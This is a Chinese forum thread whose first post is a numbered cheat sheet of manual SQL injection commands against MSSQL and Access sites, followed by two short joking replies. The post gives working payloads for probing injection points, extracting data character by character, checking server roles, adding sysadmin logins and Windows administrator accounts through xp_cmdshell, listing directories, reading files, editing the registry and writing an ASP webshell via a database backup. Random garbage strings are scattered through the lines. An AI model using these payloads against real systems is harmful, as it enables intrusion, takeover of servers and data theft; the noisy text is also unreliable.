社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4563阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 G| ^tqI  
  2.初步判断是否是mssql ;and user>0 n0nkv[  
9NKZE?5P|D  
  3.注入参数是字符'and [查询条件] and ''=' HH8a"Hq)  
/TS>I8V!  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' bMf +/n  
2L ~U^  
  5.判断数据库系统 lYU_uFOs\  
lAV6z%MmM  
  ;and (select count(*) from sysobjects)>0 mssql dc"Vc 3)  
HA"LU;5>2J  
  ;and (select count(*) from msysobjects)>0 access DH @*Oz-  
L<J%IlcfO  
Z5_MSPm  
}Li24JK  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 BB=%tz`B  
cYW F)WAog  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Ci=c"JdB  
{U7j  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 si0jXue~j\  
 XW`&1qx  
  9.(1)猜字段的ascii值(access) X=_N7!  
;\( wJ{u?Y  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 \Ui8Sgeei  
`<q{8  
  (2)猜字段的ascii值(mssql) fytgS(?I'  
(~,Q-w"  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 D6c4tA^EO  
7RTp+FC]  
  10.测试权限结构(mssql) dAohj QH:  
( 8k3z`  
>lN{FJ  
GXJJOy1"!  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ln#Lx&r;|  
zLC\Rc4  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- )=ZWn,ZB  
wIL5-k,  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ^BSMlKyB  
b[VP"KZ?  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- .,UpI|b  
L)4TW6IUk  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- B4_0+K H  
X|@|ZRN  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &PgbFy  
tJ[Hcx*N  
  ;and 1=(select IS_MEMBER('db_owner'));-- |_ E)2b:h  
!&ac}uD^g  
.u)Po;e`  
E.4`aJ@>d  
  11.添加mssql和系统的帐户 Q_qc_IcM y  
?,TON5Fl-  
  ;exec master.dbo.sp_addlogin username;-- OV Iu&6#  
  ;exec master.dbo.sp_password null,username,password;-- GYyP+7K4l[  
8xZN4ck_@  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- lRX*\ M\`  
&-s!ko4z  
  ;exec master.dbo.xp_cmdshell 'net user username password f \[Z`D  
qP*$wKY,  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- :1s6h%evrT  
#*1\h=bzmW  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- ?UQE;0 B  
~g~z"!K  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- }vPDCUZ  
d*7 Tjs{\  
C/tn0  
-D`*$rp,  
  12.(1)遍历目录 \<]nv}1O  
hA/K>Z  
  ;create table dirs(paths varchar(100), id int) sGc4^Z%l?  
n\ZDI+X  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' 0ppZ~}&  
#p6#,PZ  
  ;and (select top 1 paths from dirs)>0 1j9.Q;9  
a&M{y  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Oy&Myjny<  
X+ h|sy  
#=q)>+\  
"#qyX[\  
  (2)遍历目录 9#@dQ/*  
QY/36gK  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 4JT9EKo  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 khyn4   
w<tr<Pu'  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 -{-w5_B$  
`$fwLC3j  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 /F5g@ X&  
/`Yp]l  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 S6 `4&0'  
<._MNHC  
y8D'V)B  
+ i!/J  
  13.mssql中的存储过程 :W? 7J"  
?6; +.h\  
  xp_regenumvalues 注册表根键, 子键 K #}DXq  
/~K-0K#w  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 0Zs}y\J`  
&w- QMj M>  
  xp_regread 根键,子键,键值名 uF+if`?  
)?:V5UO\  
  ;exec xp_regread dl6d!Nz*  
1ZOHyO  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 |l 03,dOF  
W52AX.Nm  
  xp_regwrite 根键,子键, 值名, 值类型, 值 mh2t ' O  
?*tb|AL(R  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 w<| ^i*  
?A3pXa  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 eZ(<hE>  
[2a*TI  
  xp_regdeletevalue 根键,子键,值名 ZYos.ay  
e@Q<hb0<eU  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 YrS%Yvhj0  
|nk&ir6  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 AL>*Vj2h/n  
!=V>DgmW  
-y1%c^36_J  
$21+6  
  14.mssql的backup创建webshell Rq%g5lK  
?PO~$dUc]  
  use model +FP*RNM  
k^}8=,j}  
  create table cmd(str image); XnHcU=~q  
.nJErC##  
  insert into cmd(str) values (''); loZJV M  
y<.0+YL-e+  
  backup database model to disk='c:\l.asp'; 4/e-E^  
HW;,XzP=  
82WXgB>  
[k ZvBd  
  15.mssql内置函数 6'3@/.  
w*Vf{[a'  
  ;and (select @@version)>0 获得Windows的版本号 uHkL$}C  
U+3,(O  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa G9TK)Nz  
2M3.xUS  
  ;and (select user_name())>0 爆当前系统的连接用户 hu%UEB  
n4h@{Xg  
  ;and (select db_name())>0 得到当前连接的数据库 }xJ9EE*G/  
Uvgv<OR`_  
x00"d$!  
AkrUb$ }  
  16.简洁的webshell yQ?N*'}$  
<.s=)}'`P  
  use model s? @{  
HF" v \  
  create table cmd(str image); a;|C51GH  
*Em 9R  
  insert into cmd(str) values (''); [ Lt1OdGl  
.iNPLz1  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八